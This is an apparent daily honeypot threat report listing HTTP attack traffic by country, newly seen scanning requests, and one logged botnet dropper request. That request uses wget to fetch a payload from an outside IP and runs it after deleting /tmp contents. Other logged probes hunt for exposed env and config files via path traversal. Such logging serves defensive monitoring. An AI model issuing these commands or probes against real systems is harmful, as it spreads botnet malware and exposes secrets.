Daily Report: 2025-04-17#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).
There are 23 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1633 requests were recorded during the day, originating from 1 different countries, with a peak of 304 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
US | Germany |
SG | Germany |
US | Germany |
SG | Germany |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
190.72.152.73 | GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
61 | 4 | HEAD /manager/html HTTP/1.1 |
209 | 1 | GET /odinhttpcall1744884160 HTTP/1.1 |
210 | 1 | GET /OdinHttpCall1744884160 HTTP/1.1 |
224 | 1 | GET /..;/env.test.js HTTP/1.1 |
225 | 1 | GET /..;/env.production.js HTTP/1.1 |
226 | 1 | GET /..;/env.prod.js HTTP/1.1 |
253 | 1 | GET /Odin/http/call1744884160 HTTP/1.1 |
298 | 1 | GET /odinhttpcall1744905457 HTTP/1.1 |
310 | 1 | GET /OdinHttpCall1744905457 HTTP/1.1 |
316 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xA3h\xF6\x7F\x00\x00\x80\xFB\x9F\xAE\x82\x00\x00\x00\xE0\x81\xC8h\xF6\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
325 | 1 | GET /Odin/http/call1744905457 HTTP/1.1 |
346 | 1 | POST /ztp/cgi-bin/handler HTTP/1.1 |
361 | 1 | GET /assets/configs.json HTTP/1.1 |
365 | 1 | GET /app.config.json HTTP/1.1 |
368 | 1 | GET /..;/env.development.js HTTP/1.1 |
369 | 1 | GET /..;/env.dev.js HTTP/1.1 |
374 | 1 | GET /env.dev.js HTTP/1.1 |
375 | 1 | GET /web/api/config.js HTTP/1.1 |
376 | 1 | GET /src/api/config.js HTTP/1.1 |
377 | 1 | GET /src/config.js HTTP/1.1 |
378 | 1 | GET /web/config.js HTTP/1.1 |
379 | 1 | GET /assets/env.js HTTP/1.1 |
387 | 1 | GET /env.production.js HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 304 | US |
1 | 294 | NL |
2 | 170 | DE |
3 | 169 | BG |
4 | 166 | GB |
5 | 130 | SC |
6 | 65 | HK |
7 | 58 | PL |
8 | 42 | LT |
9 | 40 | RO |
10 | 20 | IL |
11 | 14 | SG |
12 | 13 | NO |
13 | 13 | AU |
14 | 10 | PT |
15 | 10 | RU |
16 | 8 | ZA |
17 | 8 | LA |
18 | 8 | GH |
19 | 8 | IN |
20 | 7 | AO |
21 | 7 | FR |
22 | 7 | CN |
23 | 6 | BR |
24 | 6 | BE |
25 | 6 | TR |
26 | 5 | UA |
27 | 5 | VN |
28 | 4 | MC |
29 | 4 | CA |
30 | 4 | KR |
31 | 4 | BA |
32 | 3 | NG |
33 | 3 | JP |
34 | 3 | IR |
35 | 2 | EC |
36 | 1 | AM |
37 | 1 | IE |
38 | 1 | IT |
39 | 1 | HU |
40 | 1 | CG |
41 | 1 | VE |
42 | 1 | SI |